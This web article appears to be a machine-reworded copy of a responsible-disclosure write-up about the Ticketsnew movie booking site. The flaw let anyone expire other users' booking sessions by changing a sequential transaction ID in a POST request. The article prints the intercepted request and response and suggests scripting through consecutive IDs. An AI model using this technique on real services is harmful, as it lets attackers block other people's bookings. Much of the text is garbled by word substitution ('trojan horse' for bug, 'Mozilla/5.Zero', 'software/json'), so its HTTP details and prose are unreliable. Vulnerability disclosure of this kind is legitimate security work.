TechnologyTicketsnew Movie Booking Software and Securities

Ticketsnew Movie Booking Software and Securities

Overview of Ticketsnew

This case observation is based on a movie booking software ticketsnew. It is pretty famous, it has over 50 downloads on the Android App Store. This app affords the quality and cutting-edge vicinity to test for films and cinemas around you. Booking tickets is now an effortless, laugh, and thrilling enjoyment for its consumers. My major goal became to understand more about the problems ticketsnew App customers are facing currently and to introduce some additional capabilities so one can create a better user revel in and simplicity of use. 

Ticketsnew Movie Booking Software and Securities

Problem Statement of Ticketsnew

To enhance the cutting-edge functions of the app and make the overall consumer enjoy of the app a good deal extra immersive and easy. On the idea of this preliminary problem statement, I started to dig deep into the topic by way of starting with consumer studies. Ticketsnew is an online portal to e-book film tickets in all of the essential cities in India. The employer was acquired by using PayTM and is backed by using Alibaba-Pictures because of its growing client base and easy UX. 

Recently I discovered a trojan horse that might have stopped you from booking tickets from the website. While I was examining GET, and POST requests via intercepting requests for the usage of Burp Suite for the duration of the software I observed a POST request that turned used to expire my current consumer session. This request was given my interest as it had the transaction ID as a parameter.

Request 

POST /calls/ExpiresOngoingTrans HTTP/1.1

Host: www.Ticketsnew.Com

Connection: near

Content-Length: 20

Accept: utility/json, textual content/javascript, */*; q=0.01

Origin: https://www.Ticketsnew.Com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.Zero (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.Zero.3904.97 Safari/537.36

Content-Type: software/json; charset=UTF-8

Sec-Fetch-Site: equal-origin

Sec-Fetch-Mode: cors

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.Nine,en;q=0.8

Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk; 

‘TransID’:60500852

My first concept turned into I need to attempt to expire different consumer sessions by changing the ID. I despatched the request to Burp Repeater and changed the ‘TransID’ with any other person consultation I had initiated in an incognito mode in an exclusive browser. And Boom, the session expired even earlier than the allocated time given by the ticketsnew.

Response on Ticketsnew

HTTP/1.1 200 OK

Cache-Control: personal, max-age=0

Content-Type: software/json; charset=utf-8

Date: Thu, 06 Feb 2020 21:04:17 GMT

Server: Microsoft-IIS/eight.Five

Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; route=/

Vary: Accept-Encoding

X-AspNet-Version: 4.Zero.30319

X-Powered-By: ASP.NET

Content-Length: nine

Connection: Close

“d”:”1″

Ticketsnew there’s no test on where the request comes from and whether or not changes to it authorizes. An interesting element I observed changed in the transaction IDs assigned to sessions have been in a sequence. So it became clear for me to predict the subsequent consultation IDs and ship the POST request. Or writing a script with non-stop IDs to send a POST request to them wouldn’t be difficult for all people. Using this trojan horse every person may want to prohibit a consumer from reserving tickets until they get frustrated and depart the website online inflicting ability revenue harm to the organisation. 

Ticketsnew is a fairly big enterprise and PayTM being the figure company response become now not expert. However, because the computer virus is resolved, I have written this article following the right disclosure coverage.

Also read this: Click Here

- Advertisement -spot_img

More From UrbanEdge

Top 10 Fun Facts About Pug Puppies You Didn’t Know

Petla Pug pups are an enthralling variety, beguiling their...

Cubvh: Spearheading the Eventual Fate of Advanced Insight

In a time where computerized change is at the...

Investigating Vyvymanga: A Door to Vivid Narrating

Introduction: In the steadily developing scene of diversion, manga has...

Common Misconceptions About Forex Robots Debunked

In the ever-evolving landscape of financial markets, Forex trading...

10 Reasons to Invest in ERP Accounting Software in the UAE

With business operations being dynamic, it is almost like...

Construction Estimation in the Digital Age: Embracing Data-Driven Decision Making

The building and construction sector is undertaking an improvement...

Have You Explored the beautiful features of 4 Carat Lab-Grown Diamond Rings?

Welcome to the dazzling world of lab-grown diamond rings,...

Revolutionizing the Industry: A&W Digital’s Impact on Marketing

In today's fast-paced digital landscape, staying ahead of the...
- Advertisement -spot_img